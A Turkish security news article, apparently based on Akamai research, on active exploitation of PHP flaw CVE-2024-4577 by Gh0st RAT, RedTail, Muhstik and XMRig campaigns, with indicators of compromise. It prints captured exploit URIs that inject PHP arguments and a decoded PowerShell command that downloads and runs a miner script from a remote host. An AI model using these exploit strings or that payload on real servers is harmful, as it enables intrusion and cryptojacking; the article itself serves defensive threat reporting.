PHP Güvenlik Açığı CVE-2024-4577 Vahşi Doğada Aktif Olarak Kullanılıyor


Kritik PHP Güvenlik Açığı CVE-2024-4577 Vahşi Doğada Aktif Olarak Kullanılıyor

PHP’deki kritik bir güvenlik açığı, CVE-2024-4577 olarak izleniyor ve Haziran 2024’te kamuoyuna açıklanmasından sadece birkaç gün sonra tehdit aktörleri tarafından aktif olarak istismar ediliyor. Bu güvenlik açığı, öncelikle Çince ve Japonca dil ayarlarını kullanan Windows sistemlerinde CGI modunda çalışan PHP kurulumlarını etkiliyor, ancak daha geniş bir kurulum yelpazesini etkileyebilir.

Akamai Güvenlik İstihbarat Tepki Ekibi (SIRT), ifşa edilmesinden itibaren 24 saat içinde bu güvenlik açığını hedef alan çok sayıda istismar girişimi tespit etti. İstismarın kolaylığı, çeşitli tehdit aktörleri tarafından hızla benimsenmesine yol açtı.

DÖRT

“Kritikliği belirlemedeki faktörlerden biri, istismarın kolaylığıdır ve bu, bir tehdit aktörünün uygulaması için oldukça basittir. RCE’yi başarmak için, bir saldırganın sunucuya PHP kodu göndermesi ve (yanlış) yorumlanması gerekir.” dedi Akamai.

"Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!"- Free Demo

Kötü Amaçlı Yazılım Kampanyaları Kusurdan Yararlanıyor

Akamai araştırmacıları, bu açığın aşağıdakiler de dahil olmak üzere çok sayıda kötü amaçlı yazılım kampanyasında kötüye kullanıldığını gözlemledi:

  • Hayalet FARE: Almanya’daki bir sunucudan kaynaklanan saldırılarda 15 yıllık bir uzaktan erişim aracı kullanıldı. Kötü amaçlı yazılım kendini yeniden adlandırdı ve bir komuta ve kontrol sunucusuna işaret etti.
  • RedTail Kripto Madenci: Bir kripto madenciliği işleminin, x86 RedTail kripto madenciliği kötü amaçlı yazılımını indiren bir kabuk betiğini alıp yürütmek için bu güvenlik açığını kötüye kullandığı tespit edildi.
  • Muhstik kötü amaçlı yazılımı: Başka bir kampanya, kripto madenciliği ve DDoS amaçlarıyla IoT cihazlarını ve Linux sunucularını hedef alan Muhstik kötü amaçlı yazılımının bir türünü indirdi.
  • XMRig: XMRig kripto madencisini uzak bir madencilik havuzundan çalıştıran bir betiği indirmek ve çalıştırmak için PowerShell kullanıldı.

Açıklamadan 24 saat sonra, SIRT, Gh0st RAT kötü amaçlı yazılımının bu güvenlik açığını hedef almaya çalıştığını gözlemledi. UPX ile paketlenmiş bir Windows yürütülebilir dosyası olan kötü amaçlı yazılım, Almanya merkezli bir komuta ve kontrol sunucusuna işaret gönderiyor ve tespit edilmekten kaçınmak için adını değiştiriyor.

RedTail Kripto Madenci

SIRT honeypot’ları CVE-2024-4577’yi kullanan bir RedTail kripto madenciliği operasyonu tespit etti. Saldırgan, Rusya merkezli bir IP adresinden kripto madenciliği kötü amaçlı yazılımını indirmek ve yürütmek için bir kabuk betiği kullandı.

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0



URI:
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

POST DATA:

Muhstik kötü amaçlı yazılımı

Bir diğer kampanya ise kripto madenciliği ve dağıtılmış hizmet engelleme (DDoS) saldırıları için Nesnelerin İnterneti ve Linux sunucularını hedef alan Muhstik adlı kötü amaçlı yazılımı indiren bir kabuk betiğini içeriyordu.

User-Agent: python-requests/2.22

URI:
/?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input

POST DATA:
;echo 1337; die;

XMRig

Dördüncü kampanya ise, uzak bir madencilik havuzundan kripto madencisini çalıştırmak için bir betiği indirmek ve çalıştırmak amacıyla PowerShell komutlarının kullanıldığı XMRig’i içeriyordu.

URI:
/test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
	
POST DATA (Base64 Encoded):
 

POST DATA (Base64 Decoded):
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 49w8gsLw7UwUVszUBtYujdN1McNkoeYucTctaePX8nmbjKABzJ9S1rigWdh5EiUT1z4NPAPchxT7RaJXN3fURUpM6F6KGjy; Remove-Item -Force $tempfile"

Akamai, etkilenen kuruluşlara sistemlerini hızla yamalamaları ve tehlike göstergelerini (IOC) izlemeleri tavsiyesinde bulunuyor.

Manuel modu kullananlar, Komut Enjeksiyon Saldırısı grubunun veya belirli ilgili kuralların “Reddet” moduna ayarlandığından emin olmalıdır. Akamai, bu güvenlik açığı için taramada bir artış gözlemledi ve durumu yakından izlemeye devam ediyor.

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

SOC/DFIR Ekipleri için uzlaşma göstergeleri

Hayalet FARE

SHA256 karma

A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e

Dosya adları

  • A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e.exe
  • phps.exe
  • Iqgqosc.exe

IPv4 adresleri

  • 147.50.253[.]109
  • 146.19.100[.]7
  • 23.237.182[.]122

BangCloud, IOC’leri VirusTotal’daki hitlerle ilişkilendirdi

  • 147.50.253[.]220
  • 147.50.253[.]222
  • 147.50.253[.]225
  • 147.50.253[.]219
  • 147.50.253[.]231
  • 147.50.253[.]99
  • 147.50.253[.]100
  • 147.50.253[.]228
  • 147.50.253[.]5
  • 147.50.253[.]4
  • 154.197.12[.].156
  • 147.50.253[.]110
  • 147.50.253[.]102
  • 147.50.253[.]218
  • 147.50.253[.]23
  • 147.50.253[.]11
  • 147.50.253[.]163
  • 147.50.253[.]2
  • 147.50.253[.]116
  • 147.50.253[.]18
  • 147.50.253[.]109
  • 147.50.253[.]106
  • 147.50.253[.]112
  • 147.50.253[.]111
  • 147.50.253[.]7
  • 147.50.253[.]104
  • 147.50.253[.]167
  • 147.50.253[.]119
  • 147.50.253[.]113
  • 147.50.253[.]103
  • 147.50.253[.]107
  • 147.50.253[.]105
  • 147.50.253[.]114
  • 147.50.253[.]108
  • 147.50.253[.]101
  • 147.50.253[.]117
  • 147.50.253[.]115
  • 147.50.229[.]12

MITRE ATT&CK teknik

  • T1091 — Çıkarılabilir Ortam Aracılığıyla Çoğaltma
  • T1547 — Önyükleme veya Oturum Açma Otomatik Başlatma Yürütmesi
  • T1056 — Giriş Yakalama
  • T1112 — Kaydı Değiştir
  • T1003 — İşletim Sistemi Kimlik Bilgisi Dökümü
  • T1120 — Çevresel Aygıt Keşfi
  • T1027 — Karmaşık Dosyalar veya Bilgiler
  • T1071 — Uygulama Katmanı Protokolü
  • T1082 — Sistem Bilgisi Keşfi
  • T1571 — Standart Dışı Bağlantı Noktası
  • T1057 — Süreç Keşfi

Kırmızı kuyruk

IPv4 adresleri

185.172.128[.]93

SHA256 karmaları

  • 2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
  • 0d70a044732a77957eaaf28d9574d75da54ae430d8ad2e4049bd182e13967a6f
  • ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
  • 9753df3ea4b9948c82310f64ff103685f78af85e3e08bb5f0d0d44047c63c315
  • 19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d



Source link